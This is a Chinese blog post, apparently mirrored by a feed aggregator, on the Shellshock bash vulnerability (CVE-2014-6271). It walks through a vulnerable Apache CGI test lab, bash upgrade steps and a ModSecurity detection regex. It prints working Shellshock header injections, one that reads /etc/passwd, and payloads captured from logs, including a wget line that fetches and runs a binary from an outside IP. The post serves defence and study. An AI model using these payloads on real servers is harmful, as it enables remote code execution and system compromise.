Quantcast
Channel: 碳基体
Viewing all articles
Browse latest Browse all 75

BASH CVE-2014-6271 shellshock 修复及防御

September 26, 2014, 3:17 am
$
0
0
bash shellshock (远程代码执行)漏洞一出,订阅的安全博客就被铺天盖地的漏洞分析,漏洞检测(从日志情况来看,网上的各种检测方法,特别是批量检测方法都被用于直接的攻击了),漏洞修复信息覆盖了,堪比娱乐圈的菲峰复合,各大乙方安全公司,甲方公司安全部门,活跃的安全明星都写了相关内容,我也厚着脸皮来个“娱记”上身,从web防御层面来讲讲bash口水故事。

一、web漏洞环境搭建
首先搭建一个web漏洞测试环境apache2+cgi模式+cgi漏洞脚本

1、设置apache2+cgi模式
测试环境:
OS:Ubuntu
WebServer:  Apache/2.2.22 (Ubuntu)
开启cgi模式
vim /etc/apache2/sites-available/default
指定cgi目录
        ScriptAlias /cgi-bin/ /var/www/cgi-bin/
        <Directory "/var/www/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
vim /etc/apache2/mods-available/mime.conf
cgi脚本解析功能,添加支持后缀
AddHandler cgi-script .cgi .pl
重启server
service apache2 restart

2、编写漏洞cgi文件
编写cgi文件进行测试
vim /var/www/cgi-bin/poc.cgi
编写
#!/bin/bash
echo "Content-type: text/html"
echo ""     
chmod +x poc.cgi

3、漏洞注入测试
测试,我们在User-Agent注入  () { :; }; /bin/cat /etc/passwd > /tmp/dumped_file 
 http 127.0.0.1/cgi-bin/poc.cgi User-Agent:'() { :;}; echo X-Bash-Test: `echo bash shellshock`'
 
远程命令执行成功,可以看到响应体中的回显
BASH CVE-2014-6271 shellshock 修复及防御 - 碳基体 - 碳基体
 

接下来我们尝试在Accept,Accept-Encoding,Accept-Language,Cookie,Host,Cache-Control进行植入,同样成功
(不要在Host,Connection中植入)


二、捕捉的常见payload
此漏洞一出,立刻各种攻击(检测?)到处乱飞了,在日志中有以下常见的payload
() { :; }; echo X-Bash-Test: `echo tcy6n3f0uU`;
() { :; }; ping -c 3 xxx.xxx.xxx.xxx
() { :; }; echo x-bash-header: hello haha
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
() { :; }; /bin/bash -c 'if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget xx.xxx.xx.xxx:5487/v64 -O /tmp/.osock; else /usr/bin/wget xx.xxx.xx.xxx:5487/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &'


三、漏洞分析参考文章
这个洞太热了,有很多分析文章了,挑选一些不错的 
http://lcx.cc/?i=4434 寻找cve-2014-6271的实例的一点思路
http://drops.wooyun.org/papers/3064 CVE-2014-6271资料汇总 BASH CVE-2014-6271 shellshock 修复及防御 - 碳基体 - 碳基体


四、升级bash进行修复
debain/ubuntu
apt-get update
apt-get -y install --only-upgrade bash

五、使用ModSecurity防御
ModSecurity安装及基本使用见

[科普文]ubuntu上安装Apache2+ModSecurity及自定义WAF规则


捕捉关键字
\(\)\s{\s+[^;}]+;\s*}\s*;

参考:
http://zone.wooyun.org/content/15392 
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
http://blog.threatstack.com/labs/2014/9/25/cve-2014-6271-and-you-a-tale-of-nagios-and-the-bash-exploit
http://lcx.cc/?i=4434 寻找cve-2014-6271的实例的一点思路
http://drops.wooyun.org/papers/3064 CVE-2014-6271资料汇总 BASH CVE-2014-6271 shellshock 修复及防御 - 碳基体 - 碳基体
Search
Viewing all articles
Browse latest Browse all 75

Trending Articles

《沈冰自述——我和周永康的故事》全本

February 8, 2015, 9:08 pm

Moog - Subsequent 25

January 16, 2020, 12:00 am

出售: 林憶蓮•回來愛的身邊 (東芝1A1頭版)

March 9, 2013, 11:02 am

筆記 - 使用 PowerShell 清除停用 AD 帳號與 OU

July 16, 2019, 11:03 pm

df-dferh-01 中国区 Android 安装 Google Play Store 后报错 的 解决办法

April 24, 2019, 6:56 am

「一棒接一棒、棒棒強棒」108學年度家長會長交接典禮

October 28, 2019, 8:49 pm

吸烟与MBTI类型判断捷径 (豆瓣 INFJ的奇幻之旅小组)

December 28, 2017, 6:55 pm

acermark龍璿國際 展出多款包裝設備

April 18, 2016, 6:02 am

枋寮北勢寮隆山宮 睽違12年再辦迎王祭典

October 15, 2018, 6:03 am

日本女优有村千佳COS集锦:狂三&黑白岩&亚丝娜&绫波丽

September 4, 2013, 2:57 am

有遇到过这个问题么。/jsb-videoplayer.js not found, possible missing file.

June 23, 2020, 2:17 am

MAS v2.8 magicgenius 汉化版 - 11.11更新

November 10, 2024, 5:46 pm

出售: Monster Cable Interlink Reference 2

May 23, 2018, 2:00 am

福建佛教人士望云和尚(林斌)的九仙禅寺被强行收走,望云妈妈被赶出寺庙

August 17, 2015, 1:12 am

R 语言中的OpenBLAS*和英特尔® 数学核心函数库的性能比较

December 21, 2016, 9:38 pm

[转载]煞貢、直星、人專吉日\金神七煞歌

March 3, 2016, 6:37 am

HAKERS哈克士戶外 12月8~14日廠拍

December 6, 2016, 3:52 am

OBS Studio 23.2.1 免安裝中文版 - 免費網路實況廣播軟體 實況主必備軟體 取代Fraps

June 16, 2019, 8:10 am

<請教>行駛中安卓機會重新開機

August 5, 2018, 7:25 am

Udp2raw-tunnel 及其一键安装脚本

October 23, 2017, 6:46 pm
Search